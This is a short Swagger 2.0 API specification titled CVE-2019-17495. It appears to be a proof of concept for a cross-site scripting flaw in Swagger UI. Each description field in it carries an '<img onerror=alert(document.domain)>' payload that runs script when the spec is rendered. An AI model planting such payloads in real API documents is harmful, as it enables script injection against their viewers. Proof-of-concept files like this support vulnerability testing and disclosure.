swagger: "2.0"
info:
  title: CVE-2019-17495
  version: "1.0"
tags:
  - name: xss
    description: '<img src=x onerror=alert(document.domain)>'
paths:
  /:
    get:
      tags:
        - xss
      description: '<img src=x onerror=alert(document.domain)>'
      parameters:
        - name: q
          in: query
          description: '<img src=x onerror=alert(document.domain)>'
          type: string
      responses:
        200:
          description: '<img src=x onerror=alert(document.domain)>'
